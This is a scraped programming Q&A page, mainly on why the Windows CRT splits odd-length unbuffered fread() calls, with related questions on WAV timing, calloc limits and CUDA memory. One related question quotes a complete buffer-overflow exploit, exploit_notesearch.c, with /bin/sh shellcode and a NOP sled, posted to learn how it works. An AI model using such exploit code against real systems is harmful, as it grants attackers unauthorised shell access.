I noticed that on Windows every time I issue an unbuffered fread() request with an odd length, it's split into 2 requests (as observed through procmon):
a) fread for my requested length-1
b) 2-byte fread for the last byte
This has an obvious performance overhead like 2 kernel requests instead of one etc.
Sample code ran on Windows 10:
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char* argv[]) {
FILE* pFile;
char* buffer;
pFile = fopen(argv[0], "rb");
setbuf(pFile, nullptr);
size_t len = 3;
buffer = (char*)malloc(sizeof(char)*len);
if (len != fread(buffer, 1, len, pFile)) { fputs("Reading error", stderr); exit(3); }
free(buffer);
fclose(pFile);
return 0;
}
This results in the following procmon reported calls:
ReadFile c:\work\cpptry\Debug\cpptry.exe SUCCESS Offset: 0, Length: 2, Priority: Normal
ReadFile c:\work\cpptry\Debug\cpptry.exe SUCCESS Offset: 2, Length: 2
It seems as if Windows is incapable of issuing odd-sized requests to the file system.
What's up with that?
This is implementation artifact.
MS CRT keeps all FILEs buffered even if you tell it to don't do this. Instead file buffer is set to internal buffer with space for two bytes. This allows to keep one code path instead of two and simplifies implementation of fast path in fgetc and fputc.
#define fgetc(_stream) (--(_stream)->_cnt >= 0 ? 0xff & *(_stream)->_ptr++ : _filbuf(_stream))
Some of you are probably bothered by size of the buffer (2 bytes when quasi unbuffered), but in _fread_nolock_s function we can find optimization
witch tries to read multiplies of buffer size directly to the destination bypassing file buffer.
See fread.c in CRT sources:
/* calc chars to read -- (count/streambufsize) * streambufsize */
nbytes = (unsigned)(count - count % streambufsize);
...
nread = _read_nolock(_fileno(stream), data, nbytes);
Because the file buffer's size is equal 2, even number of bytes is read directly to the destination and eventual one byte goes through the file buffer. Sometimes there could be some bytes in the buffer that need to be transfered to destination before optimized read can take place.
Bonus: buffer size is always forced to multiple of 2.
See setvbuf.c:
/*
* force size to be even by masking down to the nearest multiple
* of 2
*/
size &= (size_t)~1;
...
/*
* CASE 1: No Buffering.
*/
if (type & _IONBF) {
stream->_flag |= _IONBF;
buffer = (char *)&(stream->_charbuf);
size = 2;
}
Code snippets above are from VC 2013 CRT.
For comparison snippets from Universal CRT 10.0.17134
read.cpp
unsigned const bytes_to_read = stream_buffer_size != 0
? static_cast<unsigned>(maximum_bytes_to_read - maximum_bytes_to_read % stream_buffer_size)
: maximum_bytes_to_read;
...
int const bytes_read = _read_nolock(_fileno(stream.public_stream()), data, bytes_to_read);
setvbuf.cpp
// Force the buffer size to be even by masking the low order bit:
size_t const usable_buffer_size = buffer_size_in_bytes & ~static_cast<size_t>(1);
...
// Case 1: No buffering:
if (type & _IONBF)
{
return set_buffer(stream, reinterpret_cast<char*>(&stream->_charbuf), 2, _IOBUFFER_NONE);
}
And snippets from VC 6.0 (1998)
read.c
/* calc chars to read -- (count/bufsize) * bufsize */
nbytes = ( bufsize ? (count - count % bufsize) : count );
nread = _read(_fileno(stream), data, nbytes);
setvbuf.c
/*
* force size to be even by masking down to the nearest multiple
* of 2
*/
size &= (size_t)~1;
...
/*
* CASE 1: No Buffering.
*/
if (type & _IONBF) {
stream->_flag |= _IONBF;
buffer = (char *)&(stream->_charbuf);
size = 2;
}
Related
I've been focused on this book for several years trying to get through it slowly but truly by understanding all of the details. However, I've come to a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads, "for(i = 0; i < 160; i += 4)".
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset = 270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // Zero out the new memory.
strcpy(command, "./notesearch \'"); // Start command buffer.
buffer = command + strlen(command); // Set buffer at the end.
if (argc > 1) // Set offset.
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // Set return address.
for (i = 0; i < 160; i += 4) // Fill buffer with return address.
*((unsigned int *) (buffer + i)) = ret;
memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
strcat(command, "\'");
system(command); // Run exploit.
free(command);
}
What I'm not understanding with this line of code is the specific value chosen by the author of 160 (shown in bold above). Why is the value 160? Can someone please explain the logic to me?
Going through GDB I figured out that changing the value from 160 to a lower value kept the starting location the same for the NOP sled in the buffer. However, there were less bytes written to memory. With less written, the return address of the target may or may not be overwritten since if less bytes are overwritten when writing then the repeated return address may not reach the target return address. This depends on how much the value is lowered, if I understand correctly. However, this still confuses me, as from the comment itself, it states that the loop fills the buffer with the return address. To me, this makes it seem like the value 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added that to the length of the initial command (15 bytes not including escape character) and coming to the value of 50, adding that to 160 to result in 210, it definitely doesn't make sense to me. (210 would be beyond the allocated heap size of 200)
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.
I am reading data from a Riff wav fmt file, I have an array of the data chunk DataBuffer of the wav file, how can I convert the number of bytes read of the data to the number of seconds read from the wav file.
int size_buffer = (Subchunk2Size / (NumOfChan * bitsPerSample / 8));
FILE* WavResult = fopen(FileNom, "rb");
u8* DataBuffer = new u8[size_buffer];
size_t nRead = fread(DataBuffer, sizeof DataBuffer[0], size_buffer, WavResult);
I think you mixed up things a bit. Assuming the field names in the WAV header as described in http://soundfile.sapp.org/doc/WaveFormat :
ChunkID - "RIFF"
ChunkSize
Format - "WAVE"
Subchunk1ID - "fmt "
Subchunk1Size
AudioFormat
NumChannels
SampleRate
ByteRate
BlockAlign
BitsPerSample
Subchunk2ID - "data"
Subchunk2Size
data
This line of yours:
int size_buffer = (Subchunk2Size / (NumOfChan * bitsPerSample / 8));
calculates a number of samples in a single channel. Or a number of blocks, where the block is a structure that contains one sample for each channel. If you use that for allocating memory for bytes from data chunk, then it will be enough only in case of 8-bit mono audio.
If allocating memory for bytes is really what you want, then simply use Subchunk2Size as the size.
If you want to allocate memory for samples, then it will differ depending if the audio is 8-bit or 16-bit (I'm ignoring other possibilities). For 8-bit:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
uint8_t *samples = new uint8_t[num_of_samples];
and for 16-bit:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
int16_t *samples = new int16_t[num_of_samples];
Personally, I'd rather use std::vector instead of c-arrays:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
std::vector<int16_t> samples;
samples.resize(num_of_samples); // could be done in the constructor, but I am afraid of vector constructors ;-)
I also assume here that the audio is in the most popular encoding (I think), i.e., unsigned for 8-bit and signed for 16-bit. I'm also ignoring the issue of endianness.
But back to the number of seconds. We can calculate that using the total number of blocks and SampleRate. SampleRate tells us how many samples (in a single channel) there are per second. Or in another words, how many blocks there are per second. So the number of seconds is:
const double num_of_seconds = 1.0 * num_of_blocks / SampleRate;
You can calculate the number of blocks using the formula from your first line:
const uint32_t num_of_blocks = Subchunk2Size / (NumChannels * BitsPerSample / 8);
or, as we already have num_of_samples, which is the total number of samples from all channels, we can just divide that by NumChannels:
const uint32_t num_of_blocks = num_of_samples / NumChannels;
And lastly, in case all you wanted was really just to get the number of seconds from the number of bytes, then there are 2 options. You can calculate the block size:
const int block_size = NumChannels * BitsPerSample / 8;
which should be essentially the same as BlockAlign, and then divide Subchunk2Size by it, to get the number of blocks, and again by SampleRate to get the number of seconds:
const double num_of_seconds = 1.0 * Subchunk2Size / block_size / SampleRate;
// or
const double num_of_seconds = 1.0 * Subchunk2Size / BlockAlign / SampleRate;
Or you can use ByteRate, which is the number of bytes per second:
const double num_of_seconds = 1.0 * Subchunk2Size / ByteRate;
typedef struct
{
long nIndex; // object index
TCHAR path[3 * MAX_TEXT_FIELD_SIZE];
}structItems;
void method1(LPCTSTR pInput, LPTSTR pOutput, size_t iSizeOfOutput)
{
size_t iLength = 0;
iLength = _tcslen(pInput);
if (iLength > iSizeOfOutput + sizeof(TCHAR))
iLength = iSizeOfOutput - sizeof(TCHAR);
memset(pOutput, 0, iSizeOfOutput); // Access violation error
}
void main()
{
CString csSysPath = _T("fghjjjjjjjjjjjjjjjj");
structItems *pIndexSyspath = nullptr;
pIndexSyspath = (structItems *)calloc(1, sizeof(structItems) * 15555555); //If i put size as 1555555 then it works well
method1(csSysPath, pIndexSyspath[0].path, (sizeof(TCHAR) * (3 * MAX_TEXT_FIELD_SIZE)));
}
This is a sample code which cause the crash.
In the above code if the size we put 1555555 then it works well (I randomly decreased size by a digit).
This is a 32 bit application running on 64 Bit Win OS on 16GB RAM
I kindly request some one to help me understand the reason for failure and relation between calloc - size - memset.
typedef struct
{
long nIndex; // 4 bytes on Windows
TCHAR path[3 * MAX_TEXT_FIELD_SIZE]; // 1 * 3 * 255 bytes for non-unicode
} structItems;
Supposing non unicode, TCHAR is 1byte, MAX_TEXT_FIELD_SIZE is 255, so sizeof(structItems) is 255*3 + 4, which is 769 bytes for a struct. Now, you want to allocate sizeof(structItems) * 15555555, which is more than 11GiB. How could that fit into 2GiB available to 32-bit process.
What do I need to change in my program to be able to compute a higher limit of prime numbers?
Currently my algorithm works only with numbers up to 85 million. Should work with numbers up to 3 billion in my opinion.
I'm writing my own implementation of the Sieve of Eratosthenes in CUDA and I've hit a wall.
So far the algorithm seems to work fine for small numbers (below 85 million).
However, when I try to compute prime numbers up to 100 million, 2 billion, 3 billion, the system freezes (while it's computing stuff in the CUDA device), then after a few seconds, my linux machine goes back to normal (unfrozen), but the CUDA program crashes with the following error message:
CUDA error at prime.cu:129 code=6(cudaErrorLaunchTimeout) "cudaDeviceSynchronize()"
I have a GTX 780 (3 GB) and I'm allocating the sieves in a char array, so if I were to compute prime numbers up to 100,000, it would allocate 100,000 bytes in the device.
I assumed that the GPU would allow up to 3 billion numbers since it has 3 GB of memory, however, it only lets me do 85 million tops (85 million bytes = 0.08 GB)
this is my prime.cu code:
#include <stdio.h>
#include <helper_cuda.h> // checkCudaErrors() - NVIDIA_CUDA-6.0_Samples/common/inc
// #include <cuda.h>
// #include <cuda_runtime_api.h>
// #include <cuda_runtime.h>
typedef unsigned long long int uint64_t;
/******************************************************************************
* kernel that initializes the 1st couple of values in the primes array.
******************************************************************************/
__global__ static void sieveInitCUDA(char* primes)
{
primes[0] = 1; // value of 1 means the number is NOT prime
primes[1] = 1; // numbers "0" and "1" are not prime numbers
}
/******************************************************************************
* kernel for sieving the even numbers starting at 4.
******************************************************************************/
__global__ static void sieveEvenNumbersCUDA(char* primes, uint64_t max)
{
uint64_t index = blockIdx.x * blockDim.x + threadIdx.x + threadIdx.x + 4;
if (index < max)
primes[index] = 1;
}
/******************************************************************************
* kernel for finding prime numbers using the sieve of eratosthenes
* - primes: an array of bools. initially all numbers are set to "0".
* A "0" value means that the number at that index is prime.
* - max: the max size of the primes array
* - maxRoot: the sqrt of max (the other input). we don't wanna make all threads
* compute this over and over again, so it's being passed in
******************************************************************************/
__global__ static void sieveOfEratosthenesCUDA(char *primes, uint64_t max,
const uint64_t maxRoot)
{
// get the starting index, sieve only odds starting at 3
// 3,5,7,9,11,13...
/* int index = blockIdx.x * blockDim.x + threadIdx.x + threadIdx.x + 3; */
// apparently the following indexing usage is faster than the one above. Hmm
int index = blockIdx.x * blockDim.x + threadIdx.x + 3;
// make sure index won't go out of bounds, also don't start the execution
// on numbers that are already composite
if (index < maxRoot && primes[index] == 0)
{
// mark off the composite numbers
for (int j = index * index; j < max; j += index)
{
primes[j] = 1;
}
}
}
/******************************************************************************
* checkDevice()
******************************************************************************/
__host__ int checkDevice()
{
// query the Device and decide on the block size
int devID = 0; // the default device ID
cudaError_t error;
cudaDeviceProp deviceProp;
error = cudaGetDevice(&devID);
if (error != cudaSuccess)
{
printf("CUDA Device not ready or not supported\n");
printf("%s: cudaGetDevice returned error code %d, line(%d)\n", __FILE__, error, __LINE__);
exit(EXIT_FAILURE);
}
error = cudaGetDeviceProperties(&deviceProp, devID);
if (deviceProp.computeMode == cudaComputeModeProhibited || error != cudaSuccess)
{
printf("CUDA device ComputeMode is prohibited or failed to getDeviceProperties\n");
return EXIT_FAILURE;
}
// Use a larger block size for Fermi and above (see compute capability)
return (deviceProp.major < 2) ? 16 : 32;
}
/******************************************************************************
* genPrimesOnDevice
* - inputs: limit - the largest prime that should be computed
* primes - an array of size [limit], initialized to 0
******************************************************************************/
__host__ void genPrimesOnDevice(char* primes, uint64_t max)
{
int blockSize = checkDevice();
if (blockSize == EXIT_FAILURE)
return;
char* d_Primes = NULL;
int sizePrimes = sizeof(char) * max;
uint64_t maxRoot = sqrt(max);
// allocate the primes on the device and set them to 0
checkCudaErrors(cudaMalloc(&d_Primes, sizePrimes));
checkCudaErrors(cudaMemset(d_Primes, 0, sizePrimes));
// make sure that there are no errors...
checkCudaErrors(cudaPeekAtLastError());
// setup the execution configuration
dim3 dimBlock(blockSize);
dim3 dimGrid((maxRoot + dimBlock.x) / dimBlock.x);
dim3 dimGridEvens(((max + dimBlock.x) / dimBlock.x) / 2);
//////// debug
#ifdef DEBUG
printf("dimBlock(%d, %d, %d)\n", dimBlock.x, dimBlock.y, dimBlock.z);
printf("dimGrid(%d, %d, %d)\n", dimGrid.x, dimGrid.y, dimGrid.z);
printf("dimGridEvens(%d, %d, %d)\n", dimGridEvens.x, dimGridEvens.y, dimGridEvens.z);
#endif
// call the kernel
// NOTE: no need to synchronize after each kernel
// http://stackoverflow.com/a/11889641/2261947
sieveInitCUDA<<<1, 1>>>(d_Primes); // launch a single thread to initialize
sieveEvenNumbersCUDA<<<dimGridEvens, dimBlock>>>(d_Primes, max);
sieveOfEratosthenesCUDA<<<dimGrid, dimBlock>>>(d_Primes, max, maxRoot);
// check for kernel errors
checkCudaErrors(cudaPeekAtLastError());
checkCudaErrors(cudaDeviceSynchronize());
// copy the results back
checkCudaErrors(cudaMemcpy(primes, d_Primes, sizePrimes, cudaMemcpyDeviceToHost));
// no memory leaks
checkCudaErrors(cudaFree(d_Primes));
}
to test this code:
int main()
{
int max = 85000000; // 85 million
char* primes = malloc(max);
// check that it allocated correctly...
memset(primes, 0, max);
genPrimesOnDevice(primes, max);
// if you wish to display results:
for (uint64_t i = 0; i < size; i++)
{
if (primes[i] == 0) // if the value is '0', then the number is prime
{
std::cout << i; // use printf if you are using c
if ((i + 1) != size)
std::cout << ", ";
}
}
free(primes);
}
This error:
CUDA error at prime.cu:129 code=6(cudaErrorLaunchTimeout) "cudaDeviceSynchronize()"
doesn't necessarily mean anything other than that your kernel is taking too long. It's not necessarily a numerical limit, or computational error, but a system-imposed limit on the amount of time your kernel is allowed to run. Both Linux and windows can have such watchdog timers.
If you want to work around it in the linux case, review this document.
You don't mention it, but I assume your GTX780 is also hosting a (the) display. In that case, there is a time limit on kernels by default. If you can use another device as the display, then reconfigure your machine to have X not use the GTX780, as described in the link. If you do not have another GPU to use for the display, then the only option is to modify the interactivity setting indicated in the linked document, if you want to run long-running kernels. And in this situation, the keyboard/mouse/display will become non-responsive while the kernel is running. If your kernel should happen to run too long, it can be difficult to recover the machine, and may require a hard reboot. (You could also SSH into the machine, and kill the process that is using the GPU for CUDA.)
Suppose we have;
struct collapsed {
char **seq;
int num;
};
...
__device__ *collapsed xdev;
...
collapsed *x_dev
cudaGetSymbolAddress((void **)&x_dev, xdev);
cudaMemcpyToSymbol(x_dev, x, sizeof(collapsed)*size); //x already defined collapsed * , this line gives ERROR
Whay do you think I am getting error at the last line : invalid device symbol ??
The first problem here is that x_dev isn't a device symbol. It might contain an address in a device memory, but that address cannot be passed to cudaMemcpyToSymbol. The call should just be:
cudaMemcpyToSymbol(xdev, ......);
Which brings up the second problem. Doing this:
cudaMemcpyToSymbol(xdev, x, sizeof(collapsed)*size);
would be illegal. xdev is a pointer, so the only valid value you can copy to xdev is a device address. If x is the address of a struct collapsed in device memory, then the only valid version of this memory transfer operation is
cudaMemcpyToSymbol(xdev, &x, sizeof(collapsed *));
ie. x must have previously have been set to the address of memory allocated in the device, something like
collapsed *x;
cudaMalloc((void **)&x, sizeof(collapsed)*size);
cudaMemcpy(x, host_src, sizeof(collapsed)*size, cudaMemcpyHostToDevice);
As promised, here is a complete working example. First the code:
#include <cstdlib>
#include <iostream>
#include <cuda_runtime.h>
struct collapsed {
char **seq;
int num;
};
__device__ collapsed xdev;
__global__
void kernel(const size_t item_sz)
{
if (threadIdx.x < xdev.num) {
char *p = xdev.seq[threadIdx.x];
char val = 0x30 + threadIdx.x;
for(size_t i=0; i<item_sz; i++) {
p[i] = val;
}
}
}
#define gpuQ(ans) { gpu_assert((ans), __FILE__, __LINE__); }
void gpu_assert(cudaError_t code, const char *file, const int line)
{
if (code != cudaSuccess)
{
std::cerr << "gpu_assert: " << cudaGetErrorString(code) << " "
<< file << " " << line << std::endl;
exit(code);
}
}
int main(void)
{
const int nitems = 32;
const size_t item_sz = 16;
const size_t buf_sz = size_t(nitems) * item_sz;
// Gpu memory for sequences
char *_buf;
gpuQ( cudaMalloc((void **)&_buf, buf_sz) );
gpuQ( cudaMemset(_buf, 0x7a, buf_sz) );
// Host array for holding sequence device pointers
char **seq = new char*[nitems];
size_t offset = 0;
for(int i=0; i<nitems; i++, offset += item_sz) {
seq[i] = _buf + offset;
}
// Device array holding sequence pointers
char **_seq;
size_t seq_sz = sizeof(char*) * size_t(nitems);
gpuQ( cudaMalloc((void **)&_seq, seq_sz) );
gpuQ( cudaMemcpy(_seq, seq, seq_sz, cudaMemcpyHostToDevice) );
// Host copy of the xdev structure to copy to the device
collapsed xdev_host;
xdev_host.num = nitems;
xdev_host.seq = _seq;
// Copy to device symbol
gpuQ( cudaMemcpyToSymbol(xdev, &xdev_host, sizeof(collapsed)) );
// Run Kernel
kernel<<<1,nitems>>>(item_sz);
// Copy back buffer
char *buf = new char[buf_sz];
gpuQ( cudaMemcpy(buf, _buf, buf_sz, cudaMemcpyDeviceToHost) );
// Print out seq values
// Each string should be ASCII starting from ´0´ (0x30)
char *seq_vals = buf;
for(int i=0; i<nitems; i++, seq_vals += item_sz) {
std::string s;
s.append(seq_vals, item_sz);
std::cout << s << std::endl;
}
return 0;
}
and here it is compiled and run:
$ /usr/local/cuda/bin/nvcc -arch=sm_12 -Xptxas=-v -g -G -o erogol erogol.cu
./erogol.cu(19): Warning: Cannot tell what pointer points to, assuming global memory space
ptxas info : 8 bytes gmem, 4 bytes cmem[14]
ptxas info : Compiling entry function '_Z6kernelm' for 'sm_12'
ptxas info : Used 5 registers, 20 bytes smem, 4 bytes cmem[1]
$ /usr/local/cuda/bin/cuda-memcheck ./erogol
========= CUDA-MEMCHECK
0000000000000000
1111111111111111
2222222222222222
3333333333333333
4444444444444444
5555555555555555
6666666666666666
7777777777777777
8888888888888888
9999999999999999
::::::::::::::::
;;;;;;;;;;;;;;;;
<<<<<<<<<<<<<<<<
================
>>>>>>>>>>>>>>>>
????????????????
################
AAAAAAAAAAAAAAAA
BBBBBBBBBBBBBBBB
CCCCCCCCCCCCCCCC
DDDDDDDDDDDDDDDD
EEEEEEEEEEEEEEEE
FFFFFFFFFFFFFFFF
GGGGGGGGGGGGGGGG
HHHHHHHHHHHHHHHH
IIIIIIIIIIIIIIII
JJJJJJJJJJJJJJJJ
KKKKKKKKKKKKKKKK
LLLLLLLLLLLLLLLL
MMMMMMMMMMMMMMMM
NNNNNNNNNNNNNNNN
OOOOOOOOOOOOOOOO
========= ERROR SUMMARY: 0 errors
Some notes:
To simplify things a bit, I have only used a single memory allocation _buf to hold all of the string data. Each value of seq is set to a different address within _buf. This is functionally equivalent to running a separate cudaMalloc call for each pointer, but much faster.
The key concept is to assemble a copy of the structure you wish to access on the device in host memory, then copy that to the device. All of the pointers in my xdev_host are device pointers. The CUDA API doesn't have any sort of deep copy or automatic pointer translation facility, so it is the programmer's responsibility to make sure this is correct.
Each thread in the kernel just fills its sequence with a difference ASCII character. Note that I have declared my xdev as a structure, rather than pointer to structure and copy values rather than a reference to the __device__ symbol (again to simplify things slightly). But otherwise the sequence of operations is what you would need to make your design pattern work.
Because I only have access to a compute 1.x device, the compiler issues a warning. One compute 2.x and 3.x this won't happen because of the improved memory model in those devices. The warning is normal and can be safely ignored.
Because each sequence is just written into a different part of _buf, I can transfer all the sequences back to the host with a single cudaMemcpy call.